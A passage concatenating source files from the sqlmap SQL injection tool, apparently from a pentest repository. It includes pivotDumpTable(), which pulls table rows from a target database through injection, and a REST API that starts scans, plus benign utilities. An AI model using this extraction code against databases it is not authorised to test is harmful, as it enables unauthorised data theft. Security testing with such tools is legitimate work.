#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re from extra.safe2bin.safe2bin import safechardecode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.settings import MAX_INT from lib.core.unescaper import unescaper from lib.request import inject def pivotDumpTable(table, colList, count=None, blind=True): lengths = {} entries = {} dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind validColumnList = False validPivotValue = False if count is None: query = dumpNode.count % table query = whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) if isinstance(count, basestring) and count.isdigit(): count = int(count) if count == 0: infoMsg = "table '%s' appears to be empty" % unsafeSQLIdentificatorNaming(table) logger.info(infoMsg) for column in colList: lengths[column] = len(column) entries[column] = [] return entries, lengths elif not isNumPosStrValue(count): return None for column in colList: lengths[column] = 0 entries[column] = BigArray() colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) if conf.pivotColumn: if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList): infoMsg = "using column '%s' as a pivot " % conf.pivotColumn infoMsg += "for retrieving row data" logger.info(infoMsg) validPivotValue = True colList.remove(conf.pivotColumn) colList.insert(0, conf.pivotColumn) else: warnMsg = "column '%s' not " % conf.pivotColumn warnMsg += "found in table '%s'" % table logger.warn(warnMsg) if not validPivotValue: for column in colList: infoMsg = "fetching number of distinct " infoMsg += "values for column '%s'" % column logger.info(infoMsg) query = dumpNode.count2 % (column, table) query = whereQuery(query) value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(value): validColumnList = True if value == count: infoMsg = "using column '%s' as a pivot " % column infoMsg += "for retrieving row data" logger.info(infoMsg) validPivotValue = True colList.remove(column) colList.insert(0, column) break if not validColumnList: errMsg = "all column name(s) provided are non-existent" raise SqlmapNoneDataException(errMsg) if not validPivotValue: warnMsg = "no proper pivot column provided (with unique values)." 
warnMsg += " It won't be possible to retrieve all rows" logger.warn(warnMsg) pivotValue = " " breakRetrieval = False try: for i in xrange(count): if breakRetrieval: break for column in colList: def _(pivotValue): if column == colList[0]: query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) else: query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) query = whereQuery(query) return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) value = _(pivotValue) if column == colList[0]: if isNoneValue(value): for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): value = _(pivotValue) if not isNoneValue(value): break if isNoneValue(value): breakRetrieval = True break pivotValue = safechardecode(value) if conf.limitStart or conf.limitStop: if conf.limitStart and (i + 1) < conf.limitStart: warnMsg = "skipping first %d pivot " % conf.limitStart warnMsg += "point values" singleTimeWarnMessage(warnMsg) break elif conf.limitStop and (i + 1) > conf.limitStop: breakRetrieval = True break value = "" if isNoneValue(value) else unArrayizeValue(value) lengths[column] = max(lengths[column], len(value) if value else 0) entries[column].append(value) except KeyboardInterrupt: warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) except SqlmapConnectionException, e: errMsg = "connection exception detected. sqlmap " errMsg += "will display partial output" errMsg += "'%s'" % e logger.critical(errMsg) return entries, lengths def whereQuery(query): if conf.dumpWhere and query: prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") if "%s)" % conf.tbl.upper() in prefix.upper(): prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) elif re.search(r"(?i)\bWHERE\b", prefix): prefix += " AND %s" % conf.dumpWhere else: prefix += " WHERE %s" % conf.dumpWhere query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix return query
7,075
Python
.py
145
37.289655
217
0.608475
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
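pivotDumpTable() above retrieves rows without LIMIT/OFFSET support by walking a pivot column: fetch the smallest value greater than the last one seen (the dumpNode.query shape), then read the remaining columns at that value (dumpNode.query2). The per-DBMS queries reduce to the pattern below; a self-contained sqlite3 demonstration with a hypothetical users table:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(name TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 'h1'), ('bob', 'h2'), ('carol', 'h3');
""")

pivot = " "  # the seed value pivotDumpTable() starts from
while True:
    # dumpNode.query shape: smallest pivot value above the last one retrieved
    (pivot,) = conn.execute("SELECT MIN(name) FROM users WHERE name > ?", (pivot,)).fetchone()
    if pivot is None:
        break
    # dumpNode.query2 shape: the other columns at that pivot value
    (password,) = conn.execute("SELECT password FROM users WHERE name = ?", (pivot,)).fetchone()
    print(pivot, password)

This is also why the function insists on a pivot column with as many distinct values as the row count: duplicates are skipped by the strict > comparison, hence the record's warning that it won't be possible to retrieve all rows.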
18,983
deps.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/deps.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.data import logger from lib.core.dicts import DBMS_DICT from lib.core.enums import DBMS from lib.core.settings import IS_WIN def checkDependencies(): missing_libraries = set() for dbmsName, data in DBMS_DICT.items(): if data[1] is None: continue try: if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): import _mssql import pymssql if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. " warnMsg += "Download from %s" % data[2] logger.warn(warnMsg) elif dbmsName == DBMS.MYSQL: import pymysql elif dbmsName == DBMS.PGSQL: import psycopg2 elif dbmsName == DBMS.ORACLE: import cx_Oracle elif dbmsName == DBMS.SQLITE: import sqlite3 elif dbmsName == DBMS.ACCESS: import pyodbc elif dbmsName == DBMS.FIREBIRD: import kinterbasdb elif dbmsName == DBMS.DB2: import ibm_db_dbi elif dbmsName == DBMS.HSQLDB: import jaydebeapi import jpype except ImportError: warnMsg = "sqlmap requires '%s' third-party library " % data[1] warnMsg += "in order to directly connect to the database " warnMsg += "%s. Download from %s" % (dbmsName, data[2]) logger.warn(warnMsg) missing_libraries.add(data[1]) continue debugMsg = "'%s' third-party library is found" % data[1] logger.debug(debugMsg) try: import impacket debugMsg = "'python-impacket' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " warnMsg += "http://code.google.com/p/impacket/" logger.warn(warnMsg) missing_libraries.add('python-impacket') try: import ntlm debugMsg = "'python-ntlm' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'python-ntlm' third-party library for " warnMsg += "if you plan to attack a web application behind NTLM " warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" logger.warn(warnMsg) missing_libraries.add('python-ntlm') if IS_WIN: try: import pyreadline debugMsg = "'python-pyreadline' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'pyreadline' third-party library to " warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" logger.warn(warnMsg) missing_libraries.add('python-pyreadline') if len(missing_libraries) == 0: infoMsg = "all dependencies are installed" logger.info(infoMsg)
3,615
Python
.py
85
31.776471
88
0.595109
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
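checkDependencies() above is the classic optional-import probe: try each DBMS driver module, warn with a download hint on ImportError, and collect what is missing. A generic sketch of the pattern with importlib; the module-to-URL table here is illustrative, not sqlmap's DBMS_DICT:

import importlib

OPTIONAL_DEPS = {  # hypothetical entries for illustration
    "pymysql": "https://github.com/PyMySQL/PyMySQL",
    "psycopg2": "http://initd.org/psycopg/",
    "cx_Oracle": "https://oracle.github.io/python-cx_Oracle/",
}

missing = set()
for module, url in OPTIONAL_DEPS.items():
    try:
        importlib.import_module(module)
    except ImportError:
        print("missing third-party library '%s' (download from %s)" % (module, url))
        missing.add(module)

if not missing:
    print("all dependencies are installed")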
18,984
versioncheck.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/versioncheck.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import sys PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) extensions = ("gzip", "ssl", "sqlite3", "zlib") try: for _ in extensions: __import__(_) except ImportError: errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) errMsg += "most probably because current version of Python has been " errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" exit(errMsg)
820
Python
.py
18
42.555556
191
0.682957
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
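versioncheck.py above compares version strings lexicographically (PYVERSION >= "3" or PYVERSION < "2.6"), which happens to work for the 2.6/2.7 window it targets but is fragile in general: as strings, "2.10" < "2.6". Comparing sys.version_info tuples avoids the trap; a sketch of the same gate:

import sys

# Tuples compare numerically: (2, 10) > (2, 6), whereas "2.10" < "2.6" as strings.
if sys.version_info >= (3,) or sys.version_info < (2, 6):
    sys.exit("[CRITICAL] incompatible Python version detected ('%s'). "
             "Use version 2.6 or 2.7" % sys.version.split()[0])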
18,985
htmlentities.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/htmlentities.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ # Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html htmlEntities = { 'quot': 34, 'amp': 38, 'lt': 60, 'gt': 62, 'nbsp': 160, 'iexcl': 161, 'cent': 162, 'pound': 163, 'curren': 164, 'yen': 165, 'brvbar': 166, 'sect': 167, 'uml': 168, 'copy': 169, 'ordf': 170, 'laquo': 171, 'not': 172, 'shy': 173, 'reg': 174, 'macr': 175, 'deg': 176, 'plusmn': 177, 'sup2': 178, 'sup3': 179, 'acute': 180, 'micro': 181, 'para': 182, 'middot': 183, 'cedil': 184, 'sup1': 185, 'ordm': 186, 'raquo': 187, 'frac14': 188, 'frac12': 189, 'frac34': 190, 'iquest': 191, 'Agrave': 192, 'Aacute': 193, 'Acirc': 194, 'Atilde': 195, 'Auml': 196, 'Aring': 197, 'AElig': 198, 'Ccedil': 199, 'Egrave': 200, 'Eacute': 201, 'Ecirc': 202, 'Euml': 203, 'Igrave': 204, 'Iacute': 205, 'Icirc': 206, 'Iuml': 207, 'ETH': 208, 'Ntilde': 209, 'Ograve': 210, 'Oacute': 211, 'Ocirc': 212, 'Otilde': 213, 'Ouml': 214, 'times': 215, 'Oslash': 216, 'Ugrave': 217, 'Uacute': 218, 'Ucirc': 219, 'Uuml': 220, 'Yacute': 221, 'THORN': 222, 'szlig': 223, 'agrave': 224, 'aacute': 225, 'acirc': 226, 'atilde': 227, 'auml': 228, 'aring': 229, 'aelig': 230, 'ccedil': 231, 'egrave': 232, 'eacute': 233, 'ecirc': 234, 'euml': 235, 'igrave': 236, 'iacute': 237, 'icirc': 238, 'iuml': 239, 'eth': 240, 'ntilde': 241, 'ograve': 242, 'oacute': 243, 'ocirc': 244, 'otilde': 245, 'ouml': 246, 'divide': 247, 'oslash': 248, 'ugrave': 249, 'uacute': 250, 'ucirc': 251, 'uuml': 252, 'yacute': 253, 'thorn': 254, 'yuml': 255, 'OElig': 338, 'oelig': 339, 'Scaron': 352, 'fnof': 402, 'scaron': 353, 'Yuml': 376, 'circ': 710, 'tilde': 732, 'Alpha': 913, 'Beta': 914, 'Gamma': 915, 'Delta': 916, 'Epsilon': 917, 'Zeta': 918, 'Eta': 919, 'Theta': 920, 'Iota': 921, 'Kappa': 922, 'Lambda': 923, 'Mu': 924, 'Nu': 925, 'Xi': 926, 'Omicron': 927, 'Pi': 928, 'Rho': 929, 'Sigma': 931, 'Tau': 932, 'Upsilon': 933, 'Phi': 934, 'Chi': 935, 'Psi': 936, 'Omega': 937, 'alpha': 945, 'beta': 946, 'gamma': 947, 'delta': 948, 'epsilon': 949, 'zeta': 950, 'eta': 951, 'theta': 952, 'iota': 953, 'kappa': 954, 'lambda': 955, 'mu': 956, 'nu': 957, 'xi': 958, 'omicron': 959, 'pi': 960, 'rho': 961, 'sigmaf': 962, 'sigma': 963, 'tau': 964, 'upsilon': 965, 'phi': 966, 'chi': 967, 'psi': 968, 'omega': 969, 'thetasym': 977, 'upsih': 978, 'piv': 982, 'bull': 8226, 'hellip': 8230, 'prime': 8242, 'Prime': 8243, 'oline': 8254, 'frasl': 8260, 'ensp': 8194, 'emsp': 8195, 'thinsp': 8201, 'zwnj': 8204, 'zwj': 8205, 'lrm': 8206, 'rlm': 8207, 'ndash': 8211, 'mdash': 8212, 'lsquo': 8216, 'rsquo': 8217, 'sbquo': 8218, 'ldquo': 8220, 'rdquo': 8221, 'bdquo': 8222, 'dagger': 8224, 'Dagger': 8225, 'permil': 8240, 'lsaquo': 8249, 'rsaquo': 8250, 'euro': 8364, 'weierp': 8472, 'image': 8465, 'real': 8476, 'trade': 8482, 'alefsym': 8501, 'larr': 8592, 'uarr': 8593, 'rarr': 8594, 'darr': 8595, 'harr': 8596, 'crarr': 8629, 'lArr': 8656, 'uArr': 8657, 'rArr': 8658, 'dArr': 8659, 'hArr': 8660, 'forall': 8704, 'part': 8706, 'exist': 8707, 'empty': 8709, 'nabla': 8711, 'isin': 8712, 'notin': 8713, 'ni': 8715, 'prod': 8719, 'sum': 8721, 'minus': 8722, 'lowast': 8727, 'radic': 8730, 'prop': 8733, 'infin': 8734, 'ang': 8736, 'and': 8743, 'or': 8744, 'cap': 8745, 'cup': 8746, 'int': 8747, 'there4': 8756, 'sim': 8764, 'cong': 8773, 'asymp': 8776, 'ne': 8800, 'equiv': 8801, 'le': 8804, 'ge': 8805, 'sub': 8834, 'sup': 8835, 'nsub': 8836, 'sube': 8838, 'supe': 8839, 'oplus': 8853, 
'otimes': 8855, 'perp': 8869, 'sdot': 8901, 'lceil': 8968, 'rceil': 8969, 'lfloor': 8970, 'rfloor': 8971, 'lang': 9001, 'rang': 9002, 'loz': 9674, 'spades': 9824, 'clubs': 9827, 'hearts': 9829, 'diams': 9830, }
5,235
Python
.py
260
15.246154
78
0.439059
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
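The htmlEntities table above maps entity names to Unicode code points, so resolving named references is a one-regex substitution. A sketch that leaves unknown entities untouched, assuming the record's module imports as htmlentities:

import re

from htmlentities import htmlEntities  # the name -> code point table above

def decode_entities(text):
    return re.sub(r"&(\w+);",
                  lambda m: chr(htmlEntities[m.group(1)]) if m.group(1) in htmlEntities
                            else m.group(0),
                  text)

print(decode_entities("caf&eacute; &amp; cr&egrave;me"))  # café & crème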
18,986
xrange.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/xrange.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ class xrange(object): """ Advanced (re)implementation of xrange (supports slice/copy/etc.) Reference: http://code.activestate.com/recipes/521885-a-pythonic-implementation-of-xrange/ >>> foobar = xrange(1, 10) >>> 7 in foobar True >>> 11 in foobar False >>> foobar[0] 1 """ __slots__ = ['_slice'] def __init__(self, *args): if args and isinstance(args[0], type(self)): self._slice = slice(args[0].start, args[0].stop, args[0].step) else: self._slice = slice(*args) if self._slice.stop is None: raise TypeError("xrange stop must not be None") @property def start(self): if self._slice.start is not None: return self._slice.start return 0 @property def stop(self): return self._slice.stop @property def step(self): if self._slice.step is not None: return self._slice.step return 1 def __hash__(self): return hash(self._slice) def __cmp__(self, other): return (cmp(type(self), type(other)) or cmp(self._slice, other._slice)) def __repr__(self): return '%s(%r, %r, %r)' % (type(self).__name__, self.start, self.stop, self.step) def __len__(self): return self._len() def _len(self): return max(0, int((self.stop - self.start) / self.step)) def __contains__(self, value): return (self.start <= value < self.stop) and (value - self.start) % self.step == 0 def __getitem__(self, index): if isinstance(index, slice): start, stop, step = index.indices(self._len()) return xrange(self._index(start), self._index(stop), step*self.step) elif isinstance(index, (int, long)): if index < 0: fixed_index = index + self._len() else: fixed_index = index if not 0 <= fixed_index < self._len(): raise IndexError("Index %d out of %r" % (index, self)) return self._index(fixed_index) else: raise TypeError("xrange indices must be slices or integers") def _index(self, i): return self.start + self.step * i
2,464
Python
.py
69
26.898551
94
0.557846
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
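One wrinkle in the recipe above: _len() computes max(0, int((stop - start) / step)), which undercounts ranges whose span is not an exact multiple of the step. xrange(1, 10, 2) holds five members (1, 3, 5, 7, 9), but (10 - 1) / 2 truncates to 4, so len(), slicing, and the __getitem__ bounds check all run one short. The ceiling form used by built-in range fixes it; a standalone sketch:

def xrange_len(start, stop, step):
    # Ceiling division counts a trailing partial step, unlike truncating division.
    if step > 0:
        return max(0, (stop - start + step - 1) // step)
    return max(0, (start - stop - step - 1) // -step)

assert xrange_len(1, 10, 2) == 5   # 1, 3, 5, 7, 9
assert xrange_len(0, 10, 2) == 5   # 0, 2, 4, 6, 8
assert xrange_len(10, 1, -2) == 5  # 10, 8, 6, 4, 2
assert xrange_len(10, 1, 1) == 0   # empty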
18,987
api.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/api.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import logging import os import shutil import sqlite3 import sys import tempfile import time from subprocess import PIPE from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle from lib.core.convert import hexencode from lib.core.convert import dejsonize from lib.core.convert import jsonize from lib.core.data import conf from lib.core.data import kb from lib.core.data import paths from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.defaults import _defaults from lib.core.enums import CONTENT_STATUS from lib.core.enums import PART_RUN_CONTENT_TYPES from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict from lib.core.subprocessng import Popen from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook from thirdparty.bottle.bottle import post from thirdparty.bottle.bottle import request from thirdparty.bottle.bottle import response from thirdparty.bottle.bottle import run RESTAPI_SERVER_HOST = "127.0.0.1" RESTAPI_SERVER_PORT = 8775 # global settings class DataStore(object): admin_id = "" current_db = None tasks = dict() # API objects class Database(object): filepath = None def __init__(self, database=None): self.database = self.filepath if database is None else database self.connection = None self.cursor = None def connect(self, who="server"): self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None) self.cursor = self.connection.cursor() logger.debug("REST-JSON API %s connected to IPC database" % who) def disconnect(self): self.cursor.close() self.connection.close() def commit(self): self.connection.commit() def execute(self, statement, arguments=None): if arguments: self.cursor.execute(statement, arguments) else: self.cursor.execute(statement) if statement.lstrip().upper().startswith("SELECT"): return self.cursor.fetchall() def init(self): self.execute("CREATE TABLE logs(" "id INTEGER PRIMARY KEY AUTOINCREMENT, " "taskid INTEGER, time TEXT, " "level TEXT, message TEXT" ")") self.execute("CREATE TABLE data(" "id INTEGER PRIMARY KEY AUTOINCREMENT, " "taskid INTEGER, status INTEGER, " "content_type INTEGER, value TEXT" ")") self.execute("CREATE TABLE errors(" "id INTEGER PRIMARY KEY AUTOINCREMENT, " "taskid INTEGER, error TEXT" ")") class Task(object): def __init__(self, taskid): self.process = None self.temporary_directory = False self.output_directory = None self.options = None self._original_options = None self.initialize_options(taskid) def initialize_options(self, taskid): datatype = {"boolean": False, "string": None, "integer": None, "float": None} self.options = AttribDict() for _ in optDict: for name, type_ in optDict[_].items(): type_ = unArrayizeValue(type_) self.options[name] = _defaults.get(name, datatype[type_]) # Let sqlmap engine knows it is getting called by the API, # the task ID and the file path of the IPC database self.options.api = True self.options.taskid = taskid self.options.database = Database.filepath # Enforce batch mode and disable coloring and ETA self.options.batch = True self.options.disableColoring = True self.options.eta = False self._original_options = AttribDict(self.options) def set_option(self, option, value): self.options[option] = value def get_option(self, option): return self.options[option] def 
get_options(self): return self.options def reset_options(self): self.options = AttribDict(self._original_options) def set_output_directory(self): if self.get_option("outputDir"): if os.path.isdir(self.get_option("outputDir")): self.output_directory = self.get_option("outputDir") else: try: os.makedirs(self.get_option("outputDir")) self.output_directory = self.get_option("outputDir") except OSError: pass if not self.output_directory or not os.path.isdir(self.output_directory): self.output_directory = tempfile.mkdtemp(prefix="sqlmapoutput-") self.temporary_directory = True self.set_option("outputDir", self.output_directory) def clean_filesystem(self): if self.output_directory and self.temporary_directory: shutil.rmtree(self.output_directory) def engine_start(self): self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, stdin=PIPE, close_fds=False) def engine_stop(self): if self.process: return self.process.terminate() else: return None def engine_process(self): return self.process def engine_kill(self): if self.process: return self.process.kill() else: return None def engine_get_id(self): if self.process: return self.process.pid else: return None def engine_get_returncode(self): if self.process: self.process.poll() return self.process.returncode else: return None def engine_has_terminated(self): return isinstance(self.engine_get_returncode(), int) # Wrapper functions for sqlmap engine class StdDbOut(object): def __init__(self, taskid, messagetype="stdout"): # Overwrite system standard output and standard error to write # to an IPC database self.messagetype = messagetype self.taskid = taskid if self.messagetype == "stdout": sys.stdout = self else: sys.stderr = self def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None): if self.messagetype == "stdout": if content_type is None: if kb.partRun is not None: content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun) else: # Ignore all non-relevant messages return output = conf.database_cursor.execute( "SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type)) # Delete partial output from IPC database if we have got a complete output if status == CONTENT_STATUS.COMPLETE: if len(output) > 0: for index in xrange(len(output)): conf.database_cursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],)) conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) if kb.partRun: kb.partRun = None elif status == CONTENT_STATUS.IN_PROGRESS: if len(output) == 0: conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) else: new_value = "%s%s" % (dejsonize(output[0][2]), value) conf.database_cursor.execute("UPDATE data SET value = ? 
WHERE id = ?", (jsonize(new_value), output[0][0])) else: conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else "")) def flush(self): pass def close(self): pass def seek(self): pass class LogRecorder(logging.StreamHandler): def emit(self, record): """ Record emitted events to IPC database for asynchronous I/O communication with the parent process """ conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg)) def setRestAPILog(): if hasattr(conf, "api"): conf.database_cursor = Database(conf.database) conf.database_cursor.connect("client") # Set a logging handler that writes log messages to a IPC database logger.removeHandler(LOGGER_HANDLER) LOGGER_RECORDER = LogRecorder() logger.addHandler(LOGGER_RECORDER) # Generic functions def is_admin(taskid): return DataStore.admin_id == taskid @hook("after_request") def security_headers(json_header=True): """ Set some headers across all HTTP responses """ response.headers["Server"] = "Server" response.headers["X-Content-Type-Options"] = "nosniff" response.headers["X-Frame-Options"] = "DENY" response.headers["X-XSS-Protection"] = "1; mode=block" response.headers["Pragma"] = "no-cache" response.headers["Cache-Control"] = "no-cache" response.headers["Expires"] = "0" if json_header: response.content_type = "application/json; charset=UTF-8" ############################## # HTTP Status Code functions # ############################## @return_error(401) # Access Denied def error401(error=None): security_headers(False) return "Access denied" @return_error(404) # Not Found def error404(error=None): security_headers(False) return "Nothing here" @return_error(405) # Method Not Allowed (e.g. 
when requesting a POST method via GET) def error405(error=None): security_headers(False) return "Method not allowed" @return_error(500) # Internal Server Error def error500(error=None): security_headers(False) return "Internal server error" ############################# # Task management functions # ############################# # Users' methods @get("/task/new") def task_new(): """ Create new task ID """ taskid = hexencode(os.urandom(8)) DataStore.tasks[taskid] = Task(taskid) logger.debug(" [%s] Created new task" % taskid) return jsonize({"success": True, "taskid": taskid}) @get("/task/<taskid>/delete") def task_delete(taskid): """ Delete own task ID """ if taskid in DataStore.tasks: DataStore.tasks[taskid].clean_filesystem() DataStore.tasks.pop(taskid) logger.debug("[%s] Deleted task" % taskid) return jsonize({"success": True}) else: logger.warning("[%s] Invalid task ID provided to task_delete()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) ################### # Admin functions # ################### @get("/admin/<taskid>/list") def task_list(taskid): """ List task pull """ if is_admin(taskid): logger.debug("[%s] Listed task pool" % taskid) tasks = list(DataStore.tasks) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) else: logger.warning("[%s] Unauthorized call to task_list()" % taskid) return jsonize({"success": False, "message": "Unauthorized"}) @get("/admin/<taskid>/flush") def task_flush(taskid): """ Flush task spool (delete all tasks) """ if is_admin(taskid): for task in DataStore.tasks: DataStore.tasks[task].clean_filesystem() DataStore.tasks = dict() logger.debug("[%s] Flushed task pool" % taskid) return jsonize({"success": True}) else: logger.warning("[%s] Unauthorized call to task_flush()" % taskid) return jsonize({"success": False, "message": "Unauthorized"}) ################################## # sqlmap core interact functions # ################################## # Handle task's options @get("/option/<taskid>/list") def option_list(taskid): """ List options for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) logger.debug("[%s] Listed task options" % taskid) return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) @post("/option/<taskid>/get") def option_get(taskid): """ Get the value of an option (command line switch) for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) option = request.json.get("option", "") if option in DataStore.tasks[taskid].options: logger.debug("[%s] Retrieved value for option %s" % (taskid, option)) return jsonize({"success": True, option: DataStore.tasks[taskid].get_option(option)}) else: logger.debug("[%s] Requested value for unknown option %s" % (taskid, option)) return jsonize({"success": False, "message": "Unknown option", option: "not set"}) @post("/option/<taskid>/set") def option_set(taskid): """ Set an option (command line switch) for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_set()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) for option, value in request.json.items(): DataStore.tasks[taskid].set_option(option, value) logger.debug("[%s] Requested to set options" % taskid) return 
jsonize({"success": True}) # Handle scans @post("/scan/<taskid>/start") def scan_start(taskid): """ Launch a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Initialize sqlmap engine's options with user's provided options, if any for option, value in request.json.items(): DataStore.tasks[taskid].set_option(option, value) # Overwrite output directory value to a temporary directory DataStore.tasks[taskid].set_output_directory() # Launch sqlmap engine in a separate process DataStore.tasks[taskid].engine_start() logger.debug("[%s] Started scan" % taskid) return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) @get("/scan/<taskid>/stop") def scan_stop(taskid): """ Stop a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) DataStore.tasks[taskid].engine_stop() logger.debug("[%s] Stopped scan" % taskid) return jsonize({"success": True}) @get("/scan/<taskid>/kill") def scan_kill(taskid): """ Kill a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) DataStore.tasks[taskid].engine_kill() logger.debug("[%s] Killed scan" % taskid) return jsonize({"success": True}) @get("/scan/<taskid>/status") def scan_status(taskid): """ Returns status of a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) if DataStore.tasks[taskid].engine_process() is None: status = "not running" else: status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" logger.debug("[%s] Retrieved scan status" % taskid) return jsonize({ "success": True, "status": status, "returncode": DataStore.tasks[taskid].engine_get_returncode() }) @get("/scan/<taskid>/data") def 